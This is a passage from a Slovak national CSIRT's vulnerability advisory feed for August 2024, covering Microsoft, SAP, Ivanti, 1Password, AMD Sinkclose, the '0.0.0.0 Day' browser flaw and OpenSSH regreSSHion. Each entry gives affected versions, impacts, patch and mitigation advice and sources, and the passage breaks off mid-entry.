C SDK for Azure IoT
CBL Mariner 1.0 ARM
CBL Mariner 1.0 x64
CBL Mariner 2.0 ARM
CBL Mariner 2.0 x64
Dynamics CRM Service Portal Web Resource
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Copilot Studio
Microsoft Dynamics 365 (on-premises) version 9.1
Microsoft Edge (Chromium-based)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft OfficePLUS
Microsoft Outlook 2016 (32-bit edition)
Microsoft Outlook 2016 (64-bit edition)
Microsoft PowerPoint 2016 (32-bit edition)
Microsoft PowerPoint 2016 (64-bit edition)
Microsoft Project 2016 (32-bit edition)
Microsoft Project 2016 (64-bit edition)
Microsoft Teams for iOS
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.8
Remote Desktop client for Windows Desktop
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)

Opis činnosti:

Kritické zraniteľnosti:

CVE-2024-38063 (CVSS skóre 9,8)

Kritickú zraniteľnosť v komponente Windows TCP/IP by vzdialený neautentifikovaný útočník prostredníctvom zaslania špeciálne vytvorených IPv6 paketov mohol zneužiť na vzdialené vykonanie škodlivého kódu. Zraniteľnosť je možné zneužiť len na systémoch s aktivovaným IPv6 a možno ju mitigovať vypnutím podpory IPv6.

CVE-2024-38140 (CVSS skóre 9,8)

Komponent RMCAST (Windows Reliable Multicast Transport Driver) obsahuje zraniteľnosť, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť len v prípade, že je aktivovaná funkcia PGM (Pragmatic General Multicast) a ľubovoľná aplikácia počúva na PGM porte.

CVE-2024-38109 (CVSS skóre 9,1)

Zraniteľnosť v produkte Azure Health Bot sa nachádzajú v komponente Scenario Editor a spočívajú v nesprávnom spracovaní HTTP odpovedí obsahujúcich presmerovanie. Vzdialený neautentifikovaný útočník by ju prostredníctvom SSRF útoku mohol zneužiť na získanie prihlasovacích tokenov a neoprávnený prístup do systému. Zraniteľnosť odhalili bezpečnostní výskumníci zo spoločnosti TENABLE.

CVE-2024-38159, CVE-2024-38160 (CVSS skóre 9,1)

Zraniteľnosti v komponente Windows Network Virtualization spočívajú v použití odalokovaného miesta v pamäti a pretečení medzipamäte haldy. Vzdialený autentifikovaný útočník by ich mohol prostredníctvom úpravy obsahu MDL (Memory Descriptor List) zneužiť na vzdialené vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje vysoké privilégiá umožňujúce manipuláciu bežiacich procesov

CVE-2024-38206 (CVSS skóre 8,5)

Zraniteľnosť v produkte Microsoft Copilot Studio by vzdialený autentifikovaný útočník mohol zneužiť obídenie bezpečnostných mechanizmov ochrany pred SSRF (Server Side Request Forgery) a získanie neoprávneného prístupu k citlivým údajom.

CVE-2024-38166 (CVSS skóre 8,2)

Nesprávna neutralizácia vstupov pri generovaní webového obsahu v produkte Microsoft Dynamics 365 umožňuje realizáciu XSS (Cross Site Scripting) útokov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí kliknúť na útočníkom podvrhnutý odkaz.

CVE-2023-40547, CVE-2022-3775 (CVSS skóre 8,3 a 7,1)

Spoločnosť Microsoft opravila aj zraniteľnosti linuxových nástrojov grub2 a shim, ktoré umožňovali obídenie bezpečnostných mechanizmov Secure Boot a následné vykonanie škodlivého kódu.

Aktívne zneužívané zero-day zraniteľnosti:

Aktívne zneužívané zraniteľnosti sa nachádzajú v produkte Microsoft Project (CVE-2024-38189) a komponentoch Windows Scripting Engine (CVE-2024-38178), Ancillary Function Driver (CVE-2024-38193), Kernel (CVE-2024-38106), Power Dependency Coordination (CVE-2024-38107) a bezpečnostnom mechanizme Mark of the Web Security (CVE-2024-38213). Uvedené zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, eskaláciu privilégií a obídenie bezpečnostných mechanizmov SmartScreen.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby
Obídenie bezpečnostného prvku
Neoprávnená zmena v systéme

Odporúčania:

Bezodkladné nasadenie augustového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete tu.

Zdroje:

https://msrc.microsoft.com/update-guide/releaseNote/2024-Aug

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-3775

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-40547

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38109

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38140

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38159

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38160

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38166

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38206

https://www.tenable.com/blog/compromising-microsofts-ai-healthcare-chatbot-service

Kritické zraniteľnosti v produktoch SAP

Marian Danko — Thu, 15 Aug 2024 10:45:24 +0000

Spoločnosť SAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 17 zraniteľností, z toho 2 sú označené ako kritické. Kritické zraniteľnosti sa nachádzajú v produktoch SAP BusinessObjects Business Intelligence Platform a SAP Build Apps a možno ich zneužiť na realizáciu SSRF útokov a získanie neoprávneného prístupu do systému.

Zraniteľné systémy:

SAP Build Apps
SAP BusinessObjects Business Intelligence Platform
SAP BEx Web Java Runtime Export Web Service
SAP CRM ABAP
SAP Commerce, Commerce Backoffice, Commerce Cloud
SAP Content Server
SAP Document Builder
SAP NetWeaver Application Server ABAP
SAP Permit to Work
SAP Replication Server
SAP S/4 HANA
SAP Shared Service Framework
SAP Student Life Cycle Management (SLcM)
SAP Web Dispatcher

Pozn. presné verzie zraniteľných produktov nájdete na stránke výrobcu.

Opis zraniteľnosti:

SAP BusinessObjects Business Intelligence Platform:

CVE-2024-41730 (CVSS skóre 9.8)

CVE-2024-41730 spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorenej požiadavky na REST rozhranie mohol zneužiť na získanie neoprávneného prístupu a úplnej kontroly nad systémom. Zraniteľnosť je možné zneužiť len na inštanciách so zapnutou funkciou SSO (Single Sign-On).

Zraniteľnosť CVE-2024-41730 ovplyvňuje verzie produktov ENTERPRISE 430, 440.

SAP Build Apps:

CVE-2024-29415 (CVSS skóre 9.1)

Zraniteľnosť s označením CVE-2024-29415 sa nachádza v externom komponente Node.js a spočíva v nesprávnom rozlišovaní verejných a privátnych IP adries. Vzdialený útočník by ju prostredníctvom zaslania špeciálne vytvorenej požiadavky mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov.

Zraniteľnosť CVE-2024-29415 ovplyvňuje verzie produktov staršie akoSAP Build Apps, Versions ako 4.11.130.

Ostatné produkty:

Zraniteľnosti v ostatných produktoch možno zneužiť na vykonanie škodlivého kódu, realizáciu XSS (Cross Site Scripting) a SSRF (Server Side Request Forgery) útokov, XML injekciu, eskaláciu privilégií, zneprístupnenie služby, získanie neoprávneného prístupu k citlivým údajom a obídenie mechanizmov autentifikácie.

Možné škody:

Vykonanie škodlivého kódu
Eskalácia privilégií
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom
Zneprístupnenie služby
Neoprávnený prístup k citlivým údajom

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na najnovšiu možnú verziu.

Zdroje:

https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2024.html

https://www.cve.org/CVERecord?id=CVE-2024-41730

https://exchange.xforce.ibmcloud.com/vulnerabilities/350914

https://www.cve.org/CVERecord?id=CVE-2024-29415

https://exchange.xforce.ibmcloud.com/vulnerabilities/292577

Kritické zraniteľnosti v Ivanti Virtual Traffic Manager a Ivanti Neurons for ITSM

Marian Danko — Wed, 14 Aug 2024 12:25:58 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Virtual Traffic Manager a Neurons for ITSM, ktoré opravujú 3 bezpečnostné zraniteľnosti, z toho 2 sú označené ako kritické. Zneužitím zraniteľností je možné získať neoprávnený prístup do systému a k citlivým údajom.

Zraniteľné systémy:

Ivanti Virtual Traffic Manager vo verzii staršej ako 22.2R1, 22.3R3, 22.5R2, 22.6R2 a 22.7R2

Pozn. aktualizácie 22.3R3, 22.5R2 a 22.6R2 budú vydané v 34. kalendárnom týždni

Ivanti Neurons for ITSM vo verzii 2023.2, 2023.3 a 2023.4 bez bezpečnostnej záplaty

Pozn. Zraniteľnosti je možné zneužiť len na inštanciách, ktoré využívajú autentifikáciu prostredníctvom OIDC. Zraniteľné sú aj inštancie Ivanti Neurons for ITAM, nakoľko zdieľajú platformu s Ivanti Neurons for ITSM. Cloudové inštancie výrobca automaticky aktualizoval 4. augusta 2024.

Opis zraniteľnosti:

Ivanti Virtual Traffic Manager:

CVE-2024-7593 (CVSS skóre 9.8)

Zraniteľnosť spočíva v nesprávnej implementácii mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju mohol zneužiť získanie neoprávneného prístupu do administratívneho rozhrania a následné vytvorenie administrátorských účtov. Na uvedenú zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci návod pre jej zneužitie.

Úspešné zneužitie zraniteľnosti možno identifikovať analýzou obsahu Audit Logs Output. Administrátorské účty vytvorené zneužitím zraniteľnosti majú viacero polí nastavených na hodnotu !!ABSENT!!, viď. príklad:

[08/Aug/2024:21:54:22 +0530] USER=!!ABSENT!! GROUP=!!ABSENT!! AUTH=!!ABSENT!! IP=!!ABSENT!! OPERATION=adduser MODUSER=user2 MODGROUP=admin

Ivanti Neurons for ITSM:

CVE-2024-7569 (CVSS skóre 9.6)

Zraniteľnosť umožňuje vzdialenému neautentifikovanému útočníkovi získať neoprávnený prístup k citlivým údajom OIDC klienta potrebných na prihlásenie do systému a následne získať úplnú kontrolu nad systémom.

CVE-2024-7570 (CVSS skóre 8.3)

CVE-2024-7570 spočíva v nesprávnom overovaní certifikátov a vzdialený útočník v man-in-the-middle pozícii by ju mohol zneužiť na vytvorenie tokenu umožňujúceho získanie neoprávneného prístupu do systému.

Možné škody:

Neoprávnený prístup k citlivým údajom
Neoprávnený prístup do systému

Odporúčania:

Administrátorom Ivanti Virtual Traffic Manager odporúčame bezodkladnú aktualizáciu na verzie 22.2R1 alebo 22.7R2. Bezpečnostné záplaty s označení 22.3R3, 22.5R2 a 22.6R2 pre zvyšné zraniteľné verzie budú vydané v 34. kalendárnom týždni. V prípade, že aktualizáciu systémov nemožno vykonať, výrobca odporúča limitovať prístup k administratívnemu rozhraniu. Presný postup nájdete na stránke výrobcu v časti Mitigation and Workaround.

Administrátorom Ivanti Neurons for ITSM a Ivanti Neurons for ITAM odporúčame bezodkladnú inštaláciu bezpečnostných záplat.

Zdroje:

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2024-7569-CVE-2024-7570?language=en_US

Zraniteľnosti nástroja pre správu hesiel 1Password pre MacOS

Marian Danko — Tue, 13 Aug 2024 12:58:38 +0000

Vývojári nástroja pre správu hesiel 1Password for Mac vydali bezpečnostné aktualizácie, ktoré opravujú dve bezpečnostné zraniteľnosti umožňujúce získanie neoprávneného prístupu k uloženým heslám. CVE-2024-42218 a CVE-2024-42219 možno zneužiť na obídenie bezpečnostných mechanizmov operačného systému macOS a mechanizmov riadenia vzájomnej komunikácie medzi procesmi.

Zraniteľné systémy:

1Password 8 for Mac vo verzii staršej ako v8.10.38

Pozn. 1Password 7 for Mac nie sú zraniteľnosťami zasiahnuté

Opis zraniteľnosti:

CVE-2024-42219 (CVSS skóre 6.3)

Zraniteľnosť spočíva v nesprávnej implementácii bezpečnostných mechanizmov riadenia vzájomnej komunikácie bežiacich procesov. Lokálny útočník by ju spustením špeciálne vytvoreného procesu mohol zneužiť na impersonáciu 1Password rozšírenia pre webové prehliadače alebo CLI (Command Line Interface) a následnú exfiltráciu citlivých údajov.

CVE-2024-42218 (CVSS skóre 6.3)

Lokálny útočník zraniteľnosť môže zneužiť na obídenie bezpečnostných mechanizmov macOS a získanie neoprávneného prístupu k citlivým údajom na kľúčenke macOS Keychain, ktoré sú asociované s aplikáciou 1Password.

Možné škody:

Neoprávnený prístup k citlivým údajom

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu 1Password pre MacOS na verziu v8.10.38 alebo novšiu. Rovnako odporúčame aktivovať funkciu automatickej aktualizácie softvéru.

Zneužitie zraniteľností vyžaduje lokálne spustenie malvéru. Nakoľko sú phishingové kampane najčastejším spôsobom infekcie malvérom, CSIRT.SK používateľom odporúča neotvárať URL odkazy a prílohy z neoverených alebo nedôveryhodných zdrojov.

Zdroje:

https://blog.1password.com/august-2024-security-update/

https://support.1password.com/kb/202408a/

https://support.1password.com/kb/202408/

https://www.helpnetsecurity.com/2024/08/09/cve-2024-42219-cve-2024-42218/

Mesačná správa CSIRT.SK – júl 2024

Marian Danko — Tue, 13 Aug 2024 10:57:02 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci júl 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 07/2024 PDF (976 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

18 rokov stará zraniteľnosť „0.0.0.0“

Marian Danko — Tue, 13 Aug 2024 10:45:24 +0000

Výskumný tím spoločnosti Oligo Security poukázal na zraniteľnosť s názvom “0.0.0.0 Day”, ktorá ovplyvňuje webové prehliadače Google Chrome, Mozilla Firefox, Apple Safari a prehliadače na báze Chromium. Zraniteľnosť umožňuje škodlivým webovým stránkam obchádzať zabezpečenie prehliadača a komunikovať so službami spustenými v lokálnej sieti. Útočníkovi umožňuje získanie neoprávneného prístupu k lokálnym službám a vzdialené vykonanie kódu. Zraniteľnosť je známa od roku 2006.

Zraniteľné systémy:

Webové prehliadače (Google Chrome/ Chromium, Mozilla Firefox, Apple Safari)
Operačné sytémy – MacOS, Linux
Aplikácie bežiace na localhost, vrátane Selenium Grid

Opis činnosti:

Zraniteľnosť umožňuje škodlivým webovým stránkam obchádzať zabezpečenie prehliadača a komunikovať so službami spustenými v lokálnej sieti organizácie. Útočníkovi umožňuje získanie neoprávneného prístupu k lokálnym službám a vzdialené vykonanie kódu. Chyba súvisí s nejednotnou implementáciou bezpečnostných mechanizmov CORS (Cross-Origin Resource Sharing) a PNA (Private Network Access) v prehliadačoch a s nedostatočnou štandardizáciou ich fungovania pri spracovaní HTTP požiadavky zasielaných na „wildcard“ IP adresu 0.0.0.0. Táto špeciálna IP adresa na operačných systémoch macOS a Linux reprezentuje všetky lokálne IP adresy a sieťové rozhrania na zariadení.

Výsledkom je, že zdanlivo neškodná IP adresa 0.0.0.0 môže byť použitá ako nástroj na zneužitie lokálnych služieb vrátane služieb používaných na vývoj, operačných systémov a dokonca aj interných sietí.

Bezpečnostní výskumníci zachytili aktívne zneužívanie zraniteľnosti v rámci nedávnych útokov ShadowRay na AI platformy, SeleniumGreed cielených na Selenium Grid alebo PyTorch inštancie. Ľubovoľná aplikácia, ktorá beží na localhoste a je prístupná cez 0.0.0.0, je pravdepodobne náchylná na vzdialené vykonávanie kódu.

Pozn. Zraniteľnosť možno zneužiť len na zariadeniach s operačnými systémami macOS a Linux. Zraniteľnosť nemá vplyv na zariadenia so systémom Windows, nakoľko spoločnosť Microsoft blokuje adresu IP na úrovni operačného systému.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Obchádzanie bezpečnostných prvkov
Neoprávnený prístup
Vzdialené vykonanie kódu

Odporúčania:

Bezodkladná aktualizácia webových prehliadačov na najnovšie verzie. Pokiaľ nemôžete aktualizovať na najnovšiu verziu, obmedzte prístup k službám bežiacim na localhost, ak sú prístupné cez IP adresu 0.0.0.0.

Odkazy:

https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser

https://thehackernews.com/2024/08/0000-day-18-year-old-browser.html

Zraniteľnosť MS Office a 365 umožňujúca získanie NTLM hashov

Marian Danko — Tue, 13 Aug 2024 10:34:42 +0000

Spoločnosť Microsoft zverejnila informácie a odporúčania pre mitigáciu zraniteľnosti MS Office a MS 365 Apps, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na exfiltráciu NTLM hashov používaných v rámci autentifikácie.

Zraniteľné systémy:

Microsoft Office 2016
Microsoft Office 2019
Microsoft Office LTSC 2021
Microsoft 365 Apps

Opis zraniteľnosti:

CVE-2024-38200 (CVSS skóre 7.5)

Bližšie nešpecifikovanú zraniteľnosť by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeeciálne vytvoreného webového obsahu alebo súbora mohol zneužiť na získanie autentifikačných NTLM hashov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí kliknúť na URL odkaz alebo otvoriť špeciálne vytvorený súbor.

Pozn. zraniteľnosť odhalili bezpečnostní výskumníci zo spoločnosti PrivSec Consulting, ktorá bližšie detaily zverejnia v rámci konferencie DEFCON.

Možné škody:

Neoprávnený prístup k citlivým údajom

Odporúčania:

Spoločnosť Microsoft prostredníctvom funkcionality Feature Flighting nasadila protiopatrenia na všetkých verziách Microsoft Office a Microsoft 365 s platnou podporou. Po vydaní bezpečnostných záplat v rámci augustového MS Patch Tuesday odporúča bezodkladnú aktualizáciu zasiahnutých produktov, ktorá bude obsahovať finálnu verziu protiopatrení.

Zneužitie zraniteľnosti je možné mitigovať aj:

aktiváciou bezpečnostnej politiky pre blokovanie odchádzajúcej NTLM komunikácie na vzdialené servery, ktorú môžete nakonfigurovať podľa návodu
pridaním používateľov do skupiny Protected Users Security Group, ktorá zabraňuje využitiu NTML autentifikácie
blokovaním odchádzajúcej komunikácie TCP 445/SMB prostredníctvom sieťových alebo bezpečnostných prvkov

Zdroje:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38200

https://www.bleepingcomputer.com/news/security/microsoft-discloses-unpatched-office-flaw-that-exposes-ntlm-hashes/

Zraniteľnosť „Sinkclose“ v procesoroch AMD

Marian Danko — Tue, 13 Aug 2024 10:33:44 +0000

Spoločnosť AMD varuje pred vysoko závažnou zraniteľnosťou procesora, známou ako „SinkClose“. Táto chyba ovplyvňuje všetky procesory AMD vyrobené od roku 2006 a umožňuje útočníkom zvyšovanie privilégií a ľubovoľné vykonávanie kódu.

Zraniteľné systémy:

EPYC 1. , 2. , 3. a 4.generácia
EPYC Embedded 3000, 7002, 7003, and 9003, R1000, R2000, 5000, a 7000
Ryzen Embedded V1000, V2000, a V3000
Ryzen 3000, 5000, 4000, 7000, a 8000
Ryzen 3000 Mobile, 5000 Mobile, 4000 Mobile, a 7000 Mobile
Ryzen Threadripper 3000 a 7000
AMD Threadripper PRO (Castle Peak WS SP3, Chagall WS)
AMD Athlon 3000 Mobile (Dali, Pollock)
AMD Instinct MI300A

Opis činnosti:

CVE-2023-31315 (CVSS skóre 7,5)

Chyba „SinkClose“ umožňuje útočníkom s prístupom na úrovni jadra (Ring 0) upravovať nastavenia režimu správy systému (SMM), a to aj v prípade, že je aktivovaný zámok SMM. Táto zraniteľnosť môže byť zneužitá na vypnutie bezpečnostných funkcií a vloženie škodlivého kódu. Výskumníci Enrique Nissim a Krzysztof Okupski z bezpečnostnej spoločnosti IOActive objavili viacero spôsobov, ako túto zraniteľnosť úspešne zneužiť. Chyba sa nachádza v systéme System Management Random Access Memory (SMRAM) a umožňuje neopravený prístup k citlivým údajom, vrátane hesiel a osobných údajov. Pre úspešné zneužitie tejto zraniteľnosti je potrebné aby mal útočník prístup k jadru systému.

Čipy AMD využívajú ochranný mechanizmus nazývaný TSeg, ktorý po aktivácii premapováva pamäť a tým obmedzuje prístup operačných systémov k režimu správy systému (SMM). Útočníci môžu zraniteľnosťou zneužiť túto funkciu TSeg, čím získajú možnosť vykonávať ľubovoľný kód s oprávneniami na úrovni Ring -2, čo predstavuje bezpečnostné riziko.

“Pozn: Ring -2 predstavuje jednu z najvyšších úrovní oprávnení v počítačovej architektúre, nachádzajúcu sa pod úrovňou Ring -1, ktorá je používaná pre hypervízory a virtualizáciu CPU, a nad úrovňou Ring 0, ktorá je využívaná jadrom operačného systému. Táto úroveň oprávnení umožňuje prístup k veľmi nízkoúrovňovým systémovým funkciám a je tiež k dispozícii v režime správy systému (SMM).”

Ring 0 – Najvyššia úroveň oprávnení – Používa sa jadrom operačného systému. Má plný prístup k hardvéru a všetkým systémovým prostriedkom.

Ring 1 – Stredná úroveň oprávnení – určená pre menej privilegované časti operačného systému

Ring 2 – Nižšia úroveň oprávnení – určená pre menej kritické systémové úlohy alebo rozšírenia ako napríklad ovládače alebo systémové služby.

Ring 3 – Najnižšia úroveň oprávnení – používa sa na bežné aplikácie a procesy v používateľskom priestore.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Neoprávnený prístup k citlivým informáciám
Zvyšovanie privilégií
Obchádzanie bezpečnostných prvkov
Ľubovoľné vykonávanie kódu

Odporúčania:

Aktualizáciu systému BIOS špecifickú pre váš produkt si vyžiadajte od svojho výrobcu OEM. Viac informácií nájdete tu.

Odkazy:

https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html

https://www.bleepingcomputer.com/news/security/new-amd-sinkclose-flaw-helps-install-nearly-undetectable-malware/

https://www.techpowerup.com/325488/sinkclose-vulnerability-affects-every-amd-cpu-dating-back-to-2006

Kritická bezpečnostná zraniteľnosť v OpenSSH

Marian Danko — Tue, 13 Aug 2024 06:50:21 +0000

Vývojári nástroja OpenSSH vydali bezpečnostnú aktualizáciu, ktorá opravuje kritickú bezpečnostnú zraniteľnosť. Zraniteľnosť možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad zraniteľným systémom.

AKTUALIZACIA
Aktualizácia k 13.08.2024: Vývojári operačného systému FreeBSD vydali bezpečnostné aktualizácie, ktoré opravujú ďalší variant tejto zraniteľnosti s označením CVE-2024-7589, ktorý možno taktiež zneužiť na vzdialené vykonanie škodlivého kódu.

Aktualizácia k 15.07.2024: CVE-2024-6387 je v súčasnosti aktíve zneužívaná útočníkmi. Bezpečnostní výskumníci počas jej detailnej analýzy odhalili aj jej menej závažný variant s označením CVE-2024-6409, ktorý taktiež možno zneužiť na vykonanie kódu.

Zraniteľné systémy:

CVE-2024-7589

OpenSSH modul na operačných systémoch FreeBSD vo verzii staršej ako 14.1-STABLE, 14.1-RELEASE-p3, 14.0-RELEASE-p9, 13.3-STABLE, 13.3-RELEASE-p5

CVE-2024-6387

OpenSSH vo verzii od 8.5p1 po 9.7p1 (vrátane)
OpenSSH vo verzii staršej ako 4.4p1 bez aplikovaných záplat pre zraniteľnosti CVE-2006-5051 a CVE-2008-4109

Pozn. Zraniteľnosť je možné preukázateľne zneužiť na operačných systémoch LINUX na báze knižnice glibc. Operačné systémy OpenBSD nie sú zasiahnuté.

CVE-2024-6409

· OpenSSH vo verziách 8.7p1 a 8.8p1

Pozn. Uvedené verzie sú súčasťou balíkov operačného systému Rad Hat Enterprise Linux 9.

Opis zraniteľnosti:

CVE-2024-7589 (CVSS skóre 8.1)
Zraniteľnosť za špecifických podmienok vedie k vzniku súbehu pri spracovávaní signálov v rámci handlera signálov v procese sshd(8), ktorý možno prostredníctvom zaslania špeciálne vytvorených požiadaviek zneužiť na vzdialené vykonanie škodlivého kódu s oprávneniami používateľa root a získanie úplnej kontroly nad systémom. Jedná sa o ďalší variant zraniteľnosti CVE-2024-6387.

CVE-2024-6387 (CVSS skóre 9,8)

Kritická zraniteľnosť za špecifických podmienok vedie k vzniku súbehu pri spracovávaní signálov v rámci handlera SIGALRM procesu sshd. Vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorených požiadaviek mohol zneužiť na vzdialené vykonanie škodlivého kódu s oprávneniami používateľa root. Úspešným zneužitím CVE-2024-6387 možno získať úplnú kontrolu nad systémom. Na zraniteľnosť je dostupný proof-of-concept kód demonštrujúci návod na jej zneužitie a v súčasnosti je aktívne zneužívaná. Zraniteľnosť dostala názov „regreSSHion“.

CVE-2024-6409 (CVSS skóre 7,0)

Zraniteľnosť za špecifických podmienok vedie k vzniku súbehu pri spracovávaní signálov v rámci handlera SIGALRM procesu privsep. Vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorených požiadaviek mohol zneužiť na vzdialené vykonanie škodlivého kódu. Zraniteľnosť bezpečnostní výskumníci odhalili počas dodatočnej analýzy kritickej zraniteľnosti CVE-2024-6387.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup do systému
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladne aktualizovať OpenSSH na verziu 9.8p1 alebo novšiu. V prípade, že aktualizáciu nemožno vykonať, zraniteľnosť možno dočasne mitigovať úplným zákazom SSH prístupov prostredníctvom sieťových a bezpečnostných prvkov alebo nastavením premennej LoginGraceTime na hodnotu 0 v konfiguračnom súbore sshd. Zmena konfigurácie však zraniteľné systémy vystavuje riziku zneprístupnenia služby.

Taktiež odporúčame preveriť prítomnosť indikátorov kompromitácie v rámci logov sieťových a bezpečnostných prvkov a ich blokovanie.

Indikátory kompromitácie (IOC):

108.174.58[.]28

Zdroje:

https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server

https://www.openssh.com/releasenotes.html#9.8p1

https://www.bleepingcomputer.com/news/security/new-regresshion-openssh-rce-bug-gives-root-on-linux-servers/

https://thehackernews.com/2024/07/new-openssh-vulnerability-could-lead-to.html

https://exchange.xforce.ibmcloud.com/vulnerabilities/296064

https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html

https://www.openwall.com/lists/oss-security/2024/07/08/2

https://access.redhat.com/errata/RHSA-2024:4457

https://exchange.xforce.ibmcloud.com/vulnerabilities/350852

https://nvd.nist.gov/vuln/detail/CVE-2024-7589

https://www.freebsd.org/security/advisories/FreeBSD-SA-24:08.openssh.asc

Zero day zraniteľnosti Windows vedú k downgrade systému

Marian Danko — Thu, 08 Aug 2024 14:30:48 +0000

Bezpečnostný výskumník spoločnosti SafeBreach Alon Leviev na konferencii Black Hat 2024 odhalil dve zero-day zraniteľnosti. Vysoko závažné zraniteľnosti sa týkajú zvyšovania privilégií v systéme Windows Backup (VBS) vrátane podmnožiny Azure Virtual Machine SKUS.

Zraniteľné systémy:

Windows 10
Windows 11
Windows Server

Opis činnosti:

Pri útokoch typu downgrade nútia aktéri hrozieb cieľové zariadenie vrátiť sa k starším/predošlým verziám softvéru, čím sa v ňom opätovne sprístupnia zraniteľnosti, ktoré môžu byť zneužité na kompromitáciu systému.

Bezpečnostný výskumník spoločnosti SafeBreach, Alon Leviev, zistil, že proces aktualizácie systému Windows môže byť kompromitovaný takým spôsobom, ktorým sa zníži verzia komponentov operačného systému, vrátane dynamických knižníc (DLL) a jadra NT. Napriek tomu, že tieto komponenty sú neaktualizované, systém Windows Update hlási, že operačný systém je plne aktualizovaný, a nástroje na obnovu a skenovanie nedokážu odhaliť žiadne problémy.

CVE-2024-21302 (CVSS skóre 6,7) a CVE-2024-38202 (CVSS skóre 7,3)
